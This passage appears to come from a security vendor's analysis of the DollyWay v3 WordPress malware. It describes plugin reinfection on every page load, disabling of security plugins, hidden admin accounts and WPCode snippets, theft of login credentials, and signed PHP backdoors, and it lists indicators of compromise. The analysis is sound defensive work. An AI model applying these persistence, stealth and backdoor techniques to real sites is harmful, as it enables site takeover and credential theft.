id=\"h-server-side-analysis-advanced-persistence-and-stealth-mechanisms-nbsp\">Server-side analysis: Advanced persistence and stealth mechanisms\u00a0<\/h3>\n<p>Now that we know how this malware works from an external perspective, let&#8217;s explore how everything works behind the scenes.\u00a0<\/p>\n<h4 id=\"h-persistent-reinfection-mechanism-nbsp\">Persistent reinfection mechanism\u00a0<\/h4>\n<p>The malicious PHP code is injected into all active plugins and as WPCode snippets.\u00a0<\/p>\n<p>What is more interesting is that injections don\u2019t stop once the site is infected. This malware has a sophisticated reinfection procedure that takes place <strong>every time any WordPress page is opened<\/strong>. \u00a0<\/p>\n<p>It consists of 4 main steps:\u00a0<\/p>\n<ol class=\"wp-block-list is-ordered\" start=\"1\">\n<li><span>Disables security plugins from its (not very well maintained) built-in list:\u00a0<\/span>\n<ul class=\"wp-block-list\">\n<li>Wordfence\u00a0<\/li>\n<li>Ninja Firewall\u00a0<\/li>\n<li>MalCare\u00a0<\/li>\n<li>wp-cerber (WordPress.org repository says: This plugin has been closed as of September 22, 2022 and is not available for download. Reason: Security Issue.)\u00a0<\/li>\n<li>gotmls\/ Anti-Malware Security and Brute-Force Firewall\u00a0<\/li>\n<li>All-In-One Security (AIOS)\u00a0<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<ol class=\"wp-block-list is-ordered\" start=\"2\">\n<li><span>Finds a DollyWay injection in one of the infected plugins or WPCode snippets and re-obfuscates it for every new injection:\u00a0<\/span>\n<ul class=\"wp-block-list\">\n<li>Randomly renames variables and functions\u00a0<\/li>\n<li>Splits string constants with random comments\u00a0<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<ol class=\"wp-block-list is-ordered\" start=\"3\">\n<li><span>Re-injects freshly obfuscated DollyWay code into all active plugins\u00a0that do not contain valid malware<\/span>\n<ul class=\"wp-block-list\">\n<li>Strategically adds extra metadata comment at the top of the file, then injects the malicious code right after that prepending with 1000-2000 spaces so that it is not immediately visible.\u00a0<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<ol class=\"wp-block-list is-ordered\" start=\"4\">\n<li><span>Reinfects WPCode snippets\u00a0<\/span>\n<ul class=\"wp-block-list\">\n<li>Deletes all WPCode snippets (even legitimate)\u00a0<\/li>\n<li>Inserts new re-obfuscated malicious snippets\u00a0<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<p>In both the files and in WPCode snippets, the injected code looks like this:\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXcIL32dnlDiuSrFYVAftOptindXJPjV1v12X7xAYCpZ38eoD9r3GjMOeniDRbzN7UNVTPivauiHf7lkAVj-A-BvuYz77LLJGcix78T6pS6JIYwGWrBxQG_RvAhe0YehD_dX72w?key=Cnvz29y2lM3geWKH1Pc8pydZ\" alt=\"injected code in files and WPCode snippets\" loading=\"lazy\"\/><\/figure>\n<\/div>\n<p>With random variables, function names, and obfuscated string constants, the infection looks slightly different in every infected file and DB record. <\/p>\n<p>This procedure makes it hard to remove the malware as it constantly changes. Moreover, if the site has heavy traffic, the chances are it will be reinfected in the process of removing malware. If you fail to remove it from all the active plugins and WPCode snippets before someone loads any page, everything will get reinfected from a single piece of malware that can still be found either in infected plugins or in the malicious WPCode snippets.\u00a0<\/p>\n<p>So, in the case of cleanup, the best course of action would be to temporarily take the site down (redirect all traffic to some static page) or, at least, disable all plugins. \u00a0(Note: The WPCode plugin will not be visible from the WordPress dashboard because DollyWay hides it.)<\/p>\n<h4 id=\"h-wpcode-snippets-nbsp\">WPCode snippets\u00a0<\/h4>\n<p>The logic of malware reinfections suggests that they install this plugin on compromised sites and add malicious PHP snippets with the execution scope \u201ceverywhere\u201d.\u00a0<\/p>\n<p>During the never-ending reinfections, they simply delete all WPCode snippets and create new ones with re-obfuscated code.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"wpcode_snippets removal from dollyway malware campaign\" loading=\"lazy\" width=\"1288\" height=\"152\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-2.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>It\u2019s not clear what the attackers do when they compromise a site that already uses this popular plugin (WPCode has over 2 million active installations). You can imagine the damage if the site uses WPCode snippets for legitimate functionality.\u00a0<\/p>\n<p>As of October 2024, the injected WPCode snippets have specific dates associated with them that can be used as indicators of compromise.\u00a0<\/p>\n<p>In <strong>wp_posts<\/strong> table:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>post_date: <strong>2024-07-26 09:19:38<\/strong>\u00a0<\/li>\n<li>post_date_gmt: <strong>2024-07-26 09:19:38<\/strong>\u00a0<\/li>\n<li>post_title: <strong>Untitled Snippet<\/strong>\u00a0<\/li>\n<li>post_status: <strong>publish<\/strong>\u00a0<\/li>\n<li>post_modified: <strong>2024-07-26 09:25:37<\/strong>\u00a0<\/li>\n<li>post_modified_gmt: <strong>2024-07-26 09:25:37<\/strong>\u00a0<\/li>\n<li>post_type: <strong>wpcode<\/strong>\u00a0<\/li>\n<\/ul>\n<p>In <strong>wp_options<\/strong> table (option_name: <strong>wpcode_snippets<\/strong>):\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>modified: <strong>2024-08-05 10:55:28<\/strong>\u00a0<\/li>\n<li>location: <strong>everywhere<\/strong>\u00a0<\/li>\n<li>code_type: <strong>php<\/strong>\u00a0<\/li>\n<li>title: <strong>Untitled Snippet<\/strong>\u00a0<\/li>\n<\/ul>\n<p>WPCode&#8217;s presence is pretty visible in the WordPress admin interface \u2014 and it is in the attackers\u2019 best interest to keep it a secret so that the site admins don\u2019t suspect that something is not right.\u00a0<\/p>\n<p>To accomplish this, the malware removes all WPCode menus from the WordPress dashboard and removes the WPCode from the list of installed plugins. The only way to notice the presence of this plugin and the malicious snippets is to examine the <strong>wp-content\/insert-headers-and-footers\/<\/strong> directory and the plugin related records directly in the WordPress database.\u00a0<\/p>\n<h4 id=\"h-malicious-admin-users-nbsp\">Malicious admin users\u00a0<\/h4>\n<p>The WPCode plugin is not the only thing that malware tries to hide from site owners. It also removes the admin user created by the attackers from the list of existing WordPress users.\u00a0<\/p>\n<p>Since 2020, this malware is associated with malicious WordPress admin users that have random hexadecimal up to 32 character long strings as user names using the same name for email address on a similarly random hexadecimal .com domain.\u00a0<\/p>\n<p>Key characteristics of malicious admin accounts:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>Usernames: Random hexadecimal strings (up to 32 characters)\u00a0<\/li>\n<li>Email pattern: <same-as-username>@[random-hex].com\u00a0<\/same-as-username><\/li>\n<li><span>Example patterns:\u00a0<\/span>\n<ul class=\"wp-block-list\">\n<li>Username: 7591c62c3c443a75fbdf9fadfbe2802f\u00a0<\/li>\n<li>Email: 7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8[.]com\u00a0<\/li>\n<li>Username: 36e21a1c8c\u00a0<\/li>\n<li>Email: 36e21a1c8c@d5b53904ee84dac8d41331f0b[.]com\u00a0<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Examples of malicious usernames and email addresses (note, some of these credentials may also belong to previous iteration of the DollyWay campaign):\u00a0<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td>Username\u00a0<\/td>\n<td>Email\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>7591c62c3c443a75fbdf9fadfbe2802f<\/strong>\u00a0<\/td>\n<td><strong>7591c62c3c443a75fbdf9fadfbe2802f<\/strong>@<strong>113c971f77f8<\/strong>.com\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>36e21a1c8c<\/strong>\u00a0<\/td>\n<td><strong>36e21a1c8c<\/strong>@<strong>d5b53904ee84dac8d41331f0b<\/strong>.com\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>6fcb1f44c9b1772a0<\/strong>\u00a0<\/td>\n<td><strong>6fcb1f44c9b1772a0<\/strong>@<strong>1a8001dc2c3607<\/strong>.com\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>3cc40c79f2d7217139a8<\/strong>\u00a0<\/td>\n<td><strong>3cc40c79f2d7217139a8<\/strong>@<strong>27d831561ab46a5244a82<\/strong>.com\u00a0<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h4 id=\"h-stealing-wordpress-admin-credentials-nbsp\">Stealing WordPress admin credentials\u00a0<\/h4>\n<p>Attackers realize that having their own admin user in the system is good but it is not guaranteed that they will always be able to use it. Eventually such users are getting discovered and deleted. Having credentials of real admin users may prove to be a better long term solution.\u00a0<\/p>\n<p>That\u2019s why the malware monitors POST parameters from the login form and dumps them into a hidden (filename starts with .) downloadable file on the server. \u00a0<\/p>\n<h4 id=\"h-dollyway-backdoors-nbsp\">DollyWay backdoors\u00a0<\/h4>\n<p>DollyWay v3 implements multiple sophisticated backdoor mechanisms with cryptographic verification to prevent unauthorized use of the malware.\u00a0<\/p>\n<p>When a site GET request contains a predefined <strong><hex32\/><\/strong> string, it creates a PHP file with the <strong><hex32>.php<\/hex32><\/strong> name and with the contents extracted from the HTTP cookie with the same hex32&gt; name.\u00a0<\/p>\n<p>Implementation of another arbitrary PHP code execution function is more exotic. The malware monitors request URLs and, if it finds any where the part after the last slash is longer than 90 characters, it tries to extract and execute PHP from it. \u00a0<\/p>\n<p>The PHP code is not passed in plain text though and the code execution is preceded by the following procedures on the part of the request after the last slash:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>The string is sanitized to include only base64 characters. \u201c<strong>$<\/strong>\u201d is replaced by \u201c<strong>+<\/strong>\u201d and \u201c<strong>*<\/strong>\u201d is replaced by \u201c<strong>\/<\/strong>\u201d\u00a0<\/li>\n<li><span>The string is broken down into three parts:\u00a0<\/span>\n<ol class=\"wp-block-list is-ordered\">\n<li>The first 8 characters are the <strong>decode key<\/strong>\u00a0<\/li>\n<li>The last 88 characters are <strong>cryptographic signature<\/strong>\u00a0<\/li>\n<li>Everything in between is <strong>encrypted data<\/strong>\u00a0<\/li>\n<\/ol>\n<\/li>\n<li>The integrity of data is verified by the cryptographic signature using the hardcoded public key and the <strong>openssl_verify<\/strong> function.\u00a0<\/li>\n<li>If the integrity of data is verified, the data is decoded using a custom decoding XOR-based algorithm with additional layers of gzip and base64 (lets call it <strong>DollyDecode<\/strong>).\u00a0<\/li>\n<li>Another check is performed once the data is decoded. It should contain the <strong>\u2018host\u2019<\/strong> property whose value should match the host of the infected website where this backdoor is being executed.\u00a0<\/li>\n<li>If everything holds, the PHP code from the \u201ccode\u201d property of the decoded data is executed.\u00a0<\/li>\n<\/ul>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"php code sample dollyway malware campaign\" loading=\"lazy\" width=\"1106\" height=\"528\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-8.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>This sophisticated backdoor execution procedure has several goals:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>Allow sending malicious PHP commands in regular GET requests without using cookies\u00a0<\/li>\n<li><span>Prevent unauthorized use of their backdoors by signing the executable code and specifying the domain for which it is intended:\u00a0<\/span>\n<ol class=\"wp-block-list is-ordered\">\n<li>So that no one can use the backdoor to take over the site or remotely clean the infection, and;\u00a0<\/li>\n<li>No one can execute properly signed backdoor code on a different host (e.g. if you\u2019ve intercepted the backdoor request for one infected site).\u00a0<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<h4 id=\"h-earlier-iterations-of-dollyway-v3-server-side-malware-nbsp\">Earlier iterations of DollyWay v3 server-side malware\u00a0<\/h4>\n<p>Before October 2024, DollyWay v3 used a slightly different approach to website infection. It was based on the codebase of DollyWay v2.\u00a0<\/p>\n<p>In 2022, bad actors installed a single \u201cpseudo-legitimate\u201d plugin that was responsible for injection of the redirect scripts into site pages. We use the word \u201cpseudo-legitimate\u201d because these plugins are generated from code of legitimate plugins and themes. They have the initial comment with the plugin metadata copied from random legitimate plugins. Their name may also match the name of that legitimate plugin. The rest of the content doesn\u2019t have anything to do with it though. It is compiled from random functions from random files with sprinkles of malicious code that restores and executes the DollyWay PHP code from multiple WordPress options with seemingly benign names like <strong>organizerLoginUrl <\/strong>or <strong>wp_vers.<\/strong>\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXe33ibFq9soW1mAvpEhZ6HgvohIDTUU8jEGref72IRG5xF14RedEWDI_0YSdCJwG3j_z3Shxv_lzZHdK_cyblQ7SHgfJqWKYpWpW-iIe0oDxo_KBCx9k8FZElthUA6fISBPGVo?key=Cnvz29y2lM3geWKH1Pc8pydZ\" alt=\"wordpress options with seemingly benign names like organizerLoginUrl or wp_vers\" loading=\"lazy\"\/><\/figure>\n<\/div>\n<p>This approach made the detection of such plugins challenging since they look legitimate at the first glance, there were no obvious malware markers in the plugin files, the malicious code varied from file to file, and the real DollyWay code could only be found encrypted in WordPress database.\u00a0<\/p>\n<p>In 2023, Dollyway shifted from using \u201cpseudo-legitimate\u201d plugins to outright fake \u201cmust use\u201d plugins. They were placed in the \/wp-content\/mu-plugins\/ directory which <a data-eid=\"publishing.library.dollyway-world-domination.external.link.click\" data-wpel-link=\"external\" rel=\"noreferrer noopener nofollow\" target=\"_blank\" href=\"https:\/\/developer.wordpress.org\/advanced-administration\/plugins\/mu-plugins\/\">doesn\u2019t require plugin activation<\/a>.\u00a0<\/p>\n<p>This particular variant didn\u2019t pretend to be a legitimate plugin. Inside was only obfuscated code, without any plugin metadata whatsoever. \u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"obfuscated code without plugin metadata\" loading=\"lazy\" width=\"1254\" height=\"356\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-5.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>The fake plugins use random autogenerated names like:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>chordpress-excellent.php\u00a0<\/li>\n<li>gig-muambator-howdy.php\u00a0<\/li>\n<li>ultimo-mapjam-insertr-lokalise.php\u00a0<\/li>\n<\/ul>\n<p>When decoded, you can see the same approach with loading and executing the DollyWay PHP code directly from random WordPress options.\u00a0 \u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"dollyway php code\" loading=\"lazy\" width=\"1346\" height=\"504\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-3.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>The database part of this malware didn\u2019t change much and you can immediately recognize it when you decode the WordPress option and see this line at the top:\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\"\/><span class=\"line_wrapper\"><span style=\"color:#e66170; background:#281800; font-weight:bold; \">if<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#d2cd86; background:#281800; \">!<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">defined<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#00c4c4; background:#281800; \">'DOLLY_WAY'<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#b060b0; background:#281800; \">{<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">define<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#00c4c4; background:#281800; \">'DOLLY_WAY'<\/span><span style=\"color:#d2cd86; background:#281800; \">,<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#00c4c4; background:#281800; \">'World Domination'<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#b060b0; background:#281800; \">}<\/span><span style=\"color:#ffffff; background:#281800; \"\/><\/span>\n<span class=\"line_wrapper\"\/><\/pre>\n<\/div>\n<h4 id=\"h-side-effects-of-dollyway-malware-nbsp\">Side-effects of DollyWay malware\u00a0<\/h4>\n<p>Some iterations of DollyWay v3 malware involve file operations for every page load. If you monitor file creation and deletion events, such activity may be used as an indicator of compromise.\u00a0\u00a0<\/p>\n<p>The names of the temporary files used by this malware may also look a bit off:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>tmp\/base64_decode<random-string>\u00a0<\/random-string><\/li>\n<li>tmp\/plugins<random-string>\u00a0<\/random-string><\/li>\n<li>tmp\/sys_get_temp_dir<random-string>\u00a0<\/random-string><\/li>\n<li>\u2026\u00a0<\/li>\n<\/ul>\n<h4 id=\"h-additional-files-and-backdoors-nbsp\">Additional files and backdoors\u00a0<\/h4>\n<p>Another backdoor can be found injected at the bottom of random legitimate files. It is usually prepended by hundreds of empty lines, so you may easily miss it when checking files manually.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"backdoor found injected at the bottom of legitimate files\" loading=\"lazy\" width=\"1170\" height=\"152\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-4.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>The functionality of this backdoor is similar to the first type backdoor that is integrated into the DollyWay v3 malware. It expects the <strong><hex32\/><\/strong> REQUEST parameter and if it is found, creates a file on the server with the <strong><hex32>.php<\/hex32><\/strong> name and with contents of the <strong><hex32\/><\/strong> parameter.\u00a0<\/p>\n<h4 id=\"h-dollyway-maintenance-and-wordpress-update-scripts-nbsp\">DollyWay maintenance and WordPress update scripts\u00a0<\/h4>\n<p>Two PHP files are especially integral to the malware\u2019s operation and tell-tale behavior.\u00a0\u00a0<\/p>\n<h5 id=\"h-wpu-php-wordpress-update-utility-nbsp\">WPU.php: WordPress update utility\u00a0<\/h5>\n<p>The name of the malicious file, <strong>wpu.php<\/strong>, can probably be translated as WordPress Update. This script is likely used as some maintenance \/ support utility both to repair broken sites, install prerequisites and start the malware injection process. \u00a0<br \/>\u00a0<br \/>This maintenance script provides several key functions:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>WordPress core updates\u00a0<\/li>\n<li>WPCode plugin installation and updates\u00a0<\/li>\n<li>Malware installation via the <strong>cpl.php<\/strong> script \u00a0<\/li>\n<\/ul>\n<p>We don\u2019t know if all these functions are being used for every injection. What we <em>do<\/em> know is that we find this file on some compromised sites alongside the DollyWay v3 malware and it belongs to the same campaign.\u00a0<\/p>\n<p>The wpu.php file updates the target website\u2019s WordPress core files without using any WordPress functionality. The files are simply fetched from the WordPress SVN repository <strong>https:\/\/core.svn.wordpress.org\/tag\/<\/strong> and the appropriate WordPress version is guessed based on the server&#8217;s PHP version. \u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>PHP <strong>7.2.0<\/strong> and newer: the malware chooses WordPress <strong>6.6<\/strong>\u00a0<\/li>\n<li>PHP <strong>7.0.x<\/strong> and <strong>7.1.x<\/strong>: the malware chooses WordPress <strong>6.5<\/strong>\u00a0<\/li>\n<li>PHP <strong>7.0.0<\/strong> and older: the malware chooses WordPress <strong>5.1<\/strong>\u00a0<\/li>\n<\/ul>\n<p>The current iteration of the malware always installs the WPCode version <strong>2.2.1<\/strong>. The plugin files are also fetched directly from the SVN repository:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>https:\/\/plugins.svn.wordpress.org\/insert-headers-and-footers\/tags\/2.2.1\u00a0<\/li>\n<\/ul>\n<p>The script has two main work modes that try to accomplish updates in small batches:\u00a0<\/p>\n<ol class=\"wp-block-list is-ordered\" start=\"1\">\n<li><strong>wpu.php?step=<n\/><\/strong> WordPress update \u00a0<\/li>\n<li><strong>wpu.php?ihaf=<n\/><\/strong> WPCode update\u00a0<\/li>\n<\/ol>\n<p>The script is intended to work in the browser. You can tell this because it relies on JavaScript redirects to start the next stage\/iteration of the update.\u00a0<\/p>\n<p>Once both types of updates are done, the script automatically redirects to the <strong>cpl.php<\/strong> script most likely to finalize the malware installation. Interesting, that the cpl.php script has two modes of work based on presence of the 